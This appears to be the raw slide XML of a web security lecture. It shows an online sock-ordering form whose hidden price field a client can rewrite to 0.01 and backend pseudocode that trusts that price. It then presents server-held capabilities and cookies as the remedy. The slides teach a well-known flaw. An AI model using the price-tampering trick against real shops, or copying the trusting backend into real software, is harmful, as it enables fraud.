            <a:ext cx="1682167" cy="62230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pay.php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Ex: Online ord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Ex: Online ordering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="if(pay == yes &amp;&amp; price != NULL)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2952851" y="3934054"/>
            <a:ext cx="6889490" cy="2400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if(pay == yes &amp;&amp; price != NULL)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bill_creditcard(price);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deliver_socks();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else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display_transaction_cancelled_page();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="516" name="The corresponding backend processing"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2355006" y="2356845"/>
            <a:ext cx="829478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corresponding backend processing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="517" name="Anyone see a problem here?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2625600" y="7597422"/>
            <a:ext cx="775359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Anyone see a problem here?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&lt;html&gt;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2354669" y="3680935"/>
            <a:ext cx="8149630" cy="4051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&lt;html&gt;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&lt;head&gt; &lt;title&gt;Pay&lt;/title&gt; &lt;/head&gt;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&lt;body&gt;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&lt;form action=“submit_order” method=“GET”&gt;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The total cost is $5.50. Confirm order?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type=“hidden” name=“price” value=“5.50”&gt;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type=“submit” name=“pay” value=“yes”&gt;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type=“submit” name=“pay” value=“no”&gt;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&lt;/body&gt;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&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="520" name="Ex: Online ord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Ex: Online ordering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="521" name="Client can change the value!"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3542562" y="2761565"/>
            <a:ext cx="591967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Client can change the value!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522" name="value=“0.01”"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8165427" y="5680057"/>
            <a:ext cx="2100908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200">
                <a:solidFill>
                  <a:schemeClr val="accent5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value=“0.01”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2353733" y="5676851"/>
            <a:ext cx="8518545" cy="385719"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 49388"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:satOff val="24555"/>
                <a:lumOff val="22232"/>
              </a:schemeClr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2" animBg="1" advAuto="0"/>
      <p:bldP spid="522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olution: Capabil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Solution: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Capabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="526" name="Server maintains trusted stat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Server</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>maintains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trusted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state </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Server stores intermediate state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Send a pointer to that state (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capability</a:t>
            </a:r>
            <a:r>
              <a:t>) to client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Client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references </a:t>
            </a:r>
            <a:r>
              <a:t>the capability in next response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Capabilities should be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hard to guess</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Large, random numbers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>To prevent illegal access to the state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Web Bas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 Basics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="549467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Using capabil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capabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="529" name="&lt;html&gt;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2354669" y="3680935"/>
            <a:ext cx="8295462" cy="4051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&lt;html&gt;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&lt;head&gt; &lt;title&gt;Pay&lt;/title&gt; &lt;/head&gt;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&lt;body&gt;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&lt;form action=“submit_order” method=“GET”&gt;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The total cost is $5.50. Confirm order?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type=“hidden” name=“price” value=“5.50”&gt;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type=“submit” name=“pay” value=“yes”&gt;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&lt;input type=“submit” name=“pay” value=“no”&gt;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&lt;/body&gt;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&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530" name="&lt;input type=“hidden” name=“sid” value=“781234”&gt;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362560" y="5669610"/>
            <a:ext cx="7969264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2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&lt;input type=“hidden” name=“sid” value=“781234”&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="531" name="Client can no longer change price"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2990899" y="2425957"/>
            <a:ext cx="702300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Client can no longer change price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Using capabil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capabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534" name="if(pay == yes &amp;&amp; price != NULL)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3140111" y="3812536"/>
            <a:ext cx="6889490" cy="2400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if(pay == yes &amp;&amp; price != NULL)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bill_creditcard(price);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deliver_socks();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else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display_transaction_cancelled_page();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="535" name="The corresponding backend processing"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2355006" y="2364311"/>
            <a:ext cx="829478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corresponding backend processing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="536" name="But we don’t want to use hidden fields all the time!…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489346" y="7064161"/>
            <a:ext cx="12026108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400"/>
            </a:pPr>
            <a:r>
              <a:t>But we don’t want to use hidden fields all the time!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="419805" indent="-419805" algn="l">
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:t>Tedious to maintain on all the different pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="419805" indent="-419805" algn="l">
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:t>Start all over on a return visit (after closing browser window)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="537" name="price = lookup(sid);…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3140111" y="3483557"/>
            <a:ext cx="6889490" cy="27305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price = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lookup(sid)</a:t>
            </a:r>
            <a:r>
              <a:t>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if(pay == yes &amp;&amp; price != NULL)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bill_creditcard(price);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deliver_socks();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else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display_transaction_cancelled_page();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2" animBg="1" advAuto="0"/>
      <p:bldP spid="537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tatefulness with Cook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600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Statefulness with Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="Server maintains trusted state…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="5135476"/>
            <a:ext cx="11099800" cy="37300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Server maintains trusted state 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dirty="0"/>
              <a:t>Indexes it with a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cookie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Sends cookie to the client, which stores it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 smtClean="0"/>
              <a:t>Client </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>returns it with subsequent queries to same server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="541" name="Browser"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2872347" y="3167349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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542" name="Web server"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8192465" y="3167349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Web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543" name="Client"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3246050" y="2530256"/>
            <a:ext cx="11925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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="Server"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8494274" y="2530256"/>
            <a:ext cx="13363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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="547" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4898072" y="3736671"/>
            <a:ext cx="3208656" cy="651847"/>
            <a:chOff x="-125521" y="-55562"/>
            <a:chExt cx="3208654" cy="651846"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="545" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="596284"/>
              <a:ext cx="29576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546" name="HTTP Response"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-125522" y="-55563"/>
              <a:ext cx="320865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HTTP Response</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="550" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5023594" y="3053913"/>
            <a:ext cx="2957613" cy="651847"/>
            <a:chOff x="0" y="-55562"/>
            <a:chExt cx="2957612" cy="651846"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="548" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="596284"/>
              <a:ext cx="29576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549" name="HTTP Request"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="42448" y="-55563"/>
              <a:ext cx="28727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HTTP Request</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="551" name="State"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10343711" y="4057689"/>
            <a:ext cx="962178" cy="596285"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 31948"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
          </a:blipFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="12700" dist="127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State</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="554" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9920368" y="3285440"/>
            <a:ext cx="1565730" cy="1038048"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1565729" cy="1038047"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="552" name="Cookie"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1296393" cy="596285"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 31948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Cookie</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="561" name="Connection Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1285757" y="387119"/>
              <a:ext cx="279973" cy="65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2" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="3125" y="21600"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21600" y="12120"/>
                    <a:pt x="20558" y="4920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555" name="Cookie"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9916410" y="3295089"/>
            <a:ext cx="1296395" cy="596285"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 31948"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4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Cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="558" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1533069" y="3285440"/>
            <a:ext cx="1253541" cy="1251998"/>
            <a:chOff x="-291362" y="0"/>
            <a:chExt cx="1253539" cy="1251997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="556" name="Server"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-291363" y="0"/>
              <a:ext cx="1253541" cy="596285"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 31948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Server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="562" name="Connection Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-157670" y="601069"/>
              <a:ext cx="232773" cy="65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2" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="16262" y="21600"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="-4084" y="16618"/>
                    <a:pt x="-5338" y="9418"/>
                    <a:pt x="12499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559" name="Server maintains trusted state"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3214283" y="11397503"/>
            <a:ext cx="6603174" cy="596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marL="419805" indent="-419805" algn="l">
              <a:spcBef>
                <a:spcPts val="4200"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:t>Server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 maintains trusted state</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560" name="Cookie"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2369194" y="4228055"/>
            <a:ext cx="1296394" cy="596285"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 31948"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4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Cookie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61486 0.084829" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="40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86 0.084829 L -0.580341 0.095653" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="43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32694 -0.087314" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="66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694 -0.087314 L 0.580341 -0.095653" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="69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1" build="p" bldLvl="5" animBg="1" advAuto="0"/>
      <p:bldP spid="547" grpId="5" animBg="1" advAuto="0"/>
      <p:bldP spid="547" grpId="10" animBg="1" advAuto="0"/>
      <p:bldP spid="550" grpId="3" animBg="1" advAuto="0"/>
      <p:bldP spid="550" grpId="11" animBg="1" advAuto="0"/>
      <p:bldP spid="551" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="554" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="555" grpId="6" animBg="1" advAuto="0"/>
      <p:bldP spid="558" grpId="9" animBg="1" advAuto="0"/>
      <p:bldP spid="560" grpId="1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Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6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514600"/>
            <a:ext cx="10006791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508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ookies are key-value pai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6942"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Cookies are key-value pairs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="565" name="Screen Shot 2014-02-18 at 3.27.40 AM.png" descr="Screen Shot 2014-02-18 at 3.27.4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911" y="3051071"/>
            <a:ext cx="7720922" cy="4250351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Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2472474" y="3045012"/>
            <a:ext cx="7701872" cy="49699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69" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2475513" y="7395146"/>
            <a:ext cx="7007585" cy="596901"/>
            <a:chOff x="0" y="-29330"/>
            <a:chExt cx="7007584" cy="596900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="567" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="29046" y="0"/>
              <a:ext cx="6978539" cy="538239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8" name="&lt;html&gt; …… &lt;/html&gt;"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-29331"/>
              <a:ext cx="4493977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3400">
                  <a:solidFill>
                    <a:srgbClr val="FEFEFE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&lt;html&gt; …… &lt;/html&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="570" name="Headers"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="1303889" y="4984750"/>
            <a:ext cx="179312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Headers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="571" name="Data"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="1688040" y="7395146"/>
            <a:ext cx="102481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Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="572" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3378847" y="4258440"/>
            <a:ext cx="571845" cy="256401"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 34772"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent5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3" name="Set-Cookie:key=value; options; …."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3123806" y="2266949"/>
            <a:ext cx="675718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>
                <a:solidFill>
                  <a:srgbClr val="010000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Set-Cookie:</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>options</a:t>
            </a:r>
            <a:r>
              <a:t>; ….</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="574" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3988767" y="4259403"/>
            <a:ext cx="248926" cy="256402"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 35817"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent5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5" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4232113" y="4252484"/>
            <a:ext cx="5222377" cy="256401"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 34772"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="381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" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="574" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="575" grpId="3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ook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Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="578" name="Screen Shot 2014-02-18 at 3.27.40 AM.png" descr="Screen Shot 2014-02-18 at 3.27.40 AM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect t="29040" r="9130" b="65659"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1302146" y="2415577"/>
            <a:ext cx="10400624" cy="333921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Browser"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1781253" y="4489573"/>
            <a:ext cx="1939987" cy="142875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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="580" name="Client"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2154955" y="3851993"/>
            <a:ext cx="11925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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="581" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1421749" y="4412367"/>
            <a:ext cx="2658995" cy="3347358"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12290"/>
            </a:avLst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2" name="(Private)…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2036871" y="6644295"/>
            <a:ext cx="1428751" cy="1032570"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18449"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4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t>(Private)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Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="583" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2751246" y="5974422"/>
            <a:ext cx="1" cy="61377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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="586" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3680044" y="3740125"/>
            <a:ext cx="1257061" cy="1428752"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1257059" cy="1428750"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="584" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1383924"/>
              <a:ext cx="1257060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585" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1215831" y="0"/>
              <a:ext cx="1" cy="142875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587" name="Store “us” under the key “edition”…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5581862" y="4010596"/>
            <a:ext cx="6706619" cy="5041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302259" indent="-302259" algn="l" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2592"/>
            </a:pPr>
            <a:r>
              <a:t>Store “us” under the key “edition”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="302259" indent="-302259" algn="l" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2592"/>
            </a:pPr>
            <a:r>
              <a:t>This value was no good as of Feb 18, 2015</a:t>
            </a:r>
          </a:p>
          <a:p>
